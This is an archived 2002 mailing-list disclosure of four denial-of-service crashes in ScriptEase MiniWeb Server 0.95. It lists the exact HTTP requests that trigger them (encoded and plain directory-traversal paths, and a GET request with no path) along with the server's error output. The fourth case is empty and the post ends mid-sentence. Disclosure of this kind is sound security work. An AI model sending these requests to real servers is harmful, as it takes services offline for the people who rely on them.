Four More ScriptEase MiniWeb Server v0.95 DoS Attacks

From: 'ken'@FTU
Date: Tue Feb 19 2002 - 20:03:37 PST

    The following are four more Server Denial of Service Attacks against
    ScriptEase MiniWeb Server 0.95.

    These attacks do not make the server point to an invalid memory address
    like the previous post.

    I believe the first two attacks I describe are internal server problems
    due to either coding errors or incomplete coding. The second two may
    just be configuration problems on my part, as this assessment was done
    fairly quickly.

    After we receieve "Press a key..." on the server side, the server stops
    and needs to be manually restarted.

    Thanks to Tamer Sahin for his earlier post.
    (http://www.securityfocus.com/archive/1/257031)

    Cheers,
    'ken'@FTU

    <--------------- BOF ------------->

    Dos One.
    We Send:
    GET /%2e%2e/ HTTP/1.0

    ScriptEase Internal Server Reply:
    1512: Cannot compare variable of different dimension.
    Press a key...

    =======

    Dos Two.
    We Send:
    GET /../../../../../../../../../ HTTP/1.0

    ScriptEase Internal Server Reply:
    1512: Cannot compare variable of different dimension.
    Press a key...

    =======

    Dos Three.
    We Send:
    GET HTTP/1.0

    ScriptEase Internal Server Reply:
    5108: Invalid VA_LIST.
    Press a key...

    =======

    Dos Four.
    We Send:

    --
    "I grew convinced that truth, sincerity and integrity in dealings
    between man and man were of the utmost importance to the felicity of